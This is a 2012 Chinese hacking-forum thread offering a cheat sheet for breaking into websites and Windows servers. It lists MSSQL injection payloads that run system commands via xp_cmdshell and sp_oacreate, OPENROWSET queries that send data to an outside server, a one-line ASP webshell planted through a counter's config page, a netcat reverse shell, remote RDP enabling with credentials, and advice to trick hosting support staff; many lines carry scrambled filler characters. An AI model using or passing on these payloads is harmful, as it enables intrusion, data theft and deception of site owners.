找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 站库分离的方法
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 3993|回复: 1
打印 上一主题 下一主题

站库分离的方法

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-15 14:41:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
SA点数据库分离技术相关4 \0 d" \3 i3 ~
- C$ k+ C. l1 i( p0 d

$ A9 A1 k; h, A0 O1 ^5 \' H& HSA点数据库分离搞法+语句:3 @! m! V7 R. g/ r" [

0 `" t9 n" g$ ~. `; ]1 N5 ~- l注射点不显错,执行下面三条语句页面都返回正常。
2 F$ q2 d" o7 {and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')) R$ J; s$ f( k3 m3 X$ o
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')
2 u" l7 m6 R6 |( [5 ]0 `and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
6 v* @+ S! t6 _0 p2 u可以列目录,判断系统为2000,web与数据库分离+ h& G+ Z% {3 V+ G, ^% [
遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。% \# f+ O2 N% ]  T6 q
在注射点上执行
9 U6 K% y+ m. Ideclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--2 ~! C& r, k0 f' z- j# @
页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP
7 q+ t* Z- E" @2 l" j还有我用NC监听得其他端口都没有得到IP。" Y1 O5 L, N  Z. o; O2 a: m6 k! {

* j" c: }! {! e! m通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。
) F! c6 m3 ?/ l'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--
, ^4 @" W2 L/ _. T$ P% W- J/ o3 g! l, J6 ]; a2 O& n
;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--
4 W/ H) \, T& g% ?/ e, c, m# X2 d3 N4 |& m: N' K$ m3 r* \. \
现在就猜想是不是数据库是内网而且不能连外网。
" `( u8 x& ~- Q7 z/ G! d
" j; i# V, I0 x8 e+ e6 M
$ q7 F% z( L( ^. Xaccess导出txt文本代码
/ d1 r  G1 K/ m9 U8 f/ MSELECT * into [test.txt] in 'd:\web\' 'text;' from admin
: n5 ~) V7 o# ~1 J3 j0 F6 ~+ {! J, U: o2 J+ n- Z
* C; r  A/ B( h" ]( l8 q; I( V

# C: T) ^( Q* e; I# B& H自动跳转到指定网站代码头* X! T/ M: D& _( @$ _
<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>
2 w/ z0 s) X+ `! w) Z! I+ o+ @& C* E0 m( y: t
9 R5 Z$ T7 h/ j- a+ P) X
入侵java or jsp站点时默认配置文件路径:9 _! p0 z0 U2 i" g9 E" u$ y* u, W
\web-inf\web.xml0 d, H/ A* b" E
tomcat下的配置文件位置:
9 A( i5 O+ D  N  `6 F\conf\server.xml            (前面加上tomcat路径)' R: L8 N7 G% O7 [  l. s  q* i" M; I
\Tomcat 5.0\webapps\root\web-inf\struts-config.xml
/ f# s4 A4 }4 {" t0 U! x4 S
" u7 [- ~5 Q) v$ M: I: }" N4 B: G/ n! P4 t; m3 v
' i& V* a9 T0 _5 W
检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:! Q' p( H/ R) X5 Z
-1%23% v, K! n0 W& w9 J
> 9 R$ }1 D+ s& J: P5 O# Z
<
4 {; {) R$ I5 R. N/ v- \; d$ l1'+or+'1'='1
7 {9 t8 Q5 [: t7 e$ o2 mid=8%bf
3 B. r1 Z: `; k8 c7 j" I% f- K( ]) {* w# q2 z. G8 O$ M7 L9 D
全新注入点检测试法:: \. s/ o- M: ~9 z2 B0 f8 Q& Z
在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。
; J6 t' c$ B$ q! R! V! x3 _9 m1 |
9 K  i$ O/ R& K1 Y8 y4 z在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。
' l, D: j. _1 d5 m  o( J+ S, t0 P) D1 g; _. h3 b5 _3 j$ x! ]$ b4 N
搜索型注入判断方法:0 m1 N4 \- k" `* O7 }
北京%' and '1'='1' and '%'='; `1 f$ J2 |5 f( B6 u# e
北京%' and '1'='2' and '%'='. x+ O  A+ f" q6 J- X0 i

( D7 C' a3 W) `
5 f: @$ }% v4 eCOOKIES注入:7 r& O% h6 k+ V
7 ^6 p0 E( G& |* N+ U. V
javascript:alert(document.cookie="id="+escape("51 and 1=1"));
: u2 B1 e3 o6 a6 e: G, O
6 [+ a8 X0 X- W1 G/ t8 _2000专业版查看本地登录用户命令:
2 a1 L4 w0 [6 b; gnet config workstation
) R: N) j, m# f- u6 `0 ?: x7 Y9 a$ q- o- K

6 l. }. Q3 W- L3 F3 Q; s+ Q( o/ s2003下查看ipsec配置和默认防火墙配置命令:
% i1 ~! e" y  l$ U2 d: Knetsh firewall show config
( S+ k/ E: N5 V: ?: w/ K. Rnetsh ipsec static show all" p3 c" }2 i6 i9 d* X
, Q& d- q# K3 b: T2 c; h$ b! Q5 U1 h
不指派指定策略命令:
. X# N) V- z: G4 U: i0 U$ a. {netsh ipsec static set policy name=test assign=n  (test是不指派的策略名)  \8 m% S4 G; J# ~
netsh ipsec static show policy all  显示策略名' s( p% v- D" S% [- q4 b# S
' q0 f$ ]& Y4 H% k& {
, D. E$ _9 s6 D; F& y! Q
猜管理员后台小技巧:) |5 A; Y4 o" G/ |/ e
admin/left.asp , l: C3 \$ B8 \+ d/ O
admin/main.asp
' Q4 ^# T2 N# t2 nadmin/top.asp
* m4 i" P2 s! w: ?, s% ?- P/ F) Q, @admin/admin.asp
* h! S- i5 u; ^, n. V) h. i4 V: ?会现出菜单导航,然后迅雷下载全部链接: T5 y! M/ c  Y" [2 B: X' ]% ?" X! G
6 |1 M- o# M+ F6 f

! @6 M) f/ d/ P5 Q社会工程学:
$ J) C1 l% n& s. b' }& A( }* {用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人
' K& n5 Y2 R# G7 p  j  P然后去骗客服. e! {, [2 @: Y7 N* n5 u
9 q; G, z) H# z6 |8 Z- _; _

' O; M1 }9 r! A2 P" ~统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码: , {$ D  V; N6 }1 i6 ^
查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">, & S$ C" U, Z* D/ ^0 w7 V
  存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。
" {  \9 \% j+ J6 s5 d) k8 F+ w! f) L: A
0 c+ V2 n. A8 g5 d& `& x- m' a
, |9 R4 E, G6 _% C
6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)' A4 c0 x& ~, e0 m) V

) [& C7 @% h1 q! I$ I4 U" F2 f) a. G; s6 M/ c; n+ j
+ I. V7 L- R4 l* F- q
CMD加密注册表位置
3 w* {/ D' J# R& l$ u- J: {, V(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor0 s) r8 `" x9 a
AutoRun' S0 g) g. M' H2 y" A
* H/ x7 o1 S1 L; Z+ M* Y
(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor
! k1 Q2 A3 d/ O5 Z. RAutoRun# c) a+ Z! ?9 l, J: _
" n: t5 c0 `. W! t

9 N+ _+ i( ~2 N1 ]) ^在找注入时搜索Hidden,把他改成test' `$ o: O5 n- G4 L

) t5 X# f% V- m& E7 t, y% D! W7 M! r3 B; p2 t3 a
1 ]5 e7 B7 F6 A  V8 T
mstsc /v:IP /console - e( `6 G5 p3 G9 g$ f, d

1 L. b0 |- u' z- L* a' u5 d9 o0 ?* N9 j5 C  i
一句话开3389:
8 }8 O% W. H9 |! G! _( J( o# X8 d6 _2 n
最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>  
; E$ K* L/ f! l0 {3 j4 w开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1          就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.
' {1 Q; P- n+ S/ o+ C2 E* @/ y& y1 Z3 Z

! U3 ^* b, b! H0 D2 B* y知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:0 x% ~# X2 ?# s5 G+ S
Insert into admin(user,pwd) values('test','test')
* r/ J: h$ x" ^+ H. p" H
7 `9 k3 J; ]# ^$ {& o. G" ^3 c
0 r0 Y4 }0 ?$ |NC反弹
8 f4 Y  {- \% Q& w5 v先在本机执行:     nc -vv -lp 监听的端口     (自己执行)   
# f( i$ y- W& Q# t$ |然后在服务器上执行:  nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)  Q  L9 F+ w1 }1 U
* P7 x. R2 F: G! f7 v" ?5 a
) a( d0 J4 v9 J( L
在脚本入侵过程中要经常常试用%00来确认下参数是否有问题/ a6 E1 @, e7 w. w: ?" E
# e0 H. \+ m: L6 x, P% }) R
有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录9 a- _, G& n% i3 V$ _- R/ l
例如:0 ^. ?& T$ N9 |4 [9 V
subst k: d:\www\ 用d盘www目录替代k盘
( k  O( a( Q' M0 p( psubst k: /d  解除K盘代替
回复

使用道具 举报

沙发
匿名  发表于 2017-12-20 02:36:51
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta
回复 支持 反对

使用道具

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表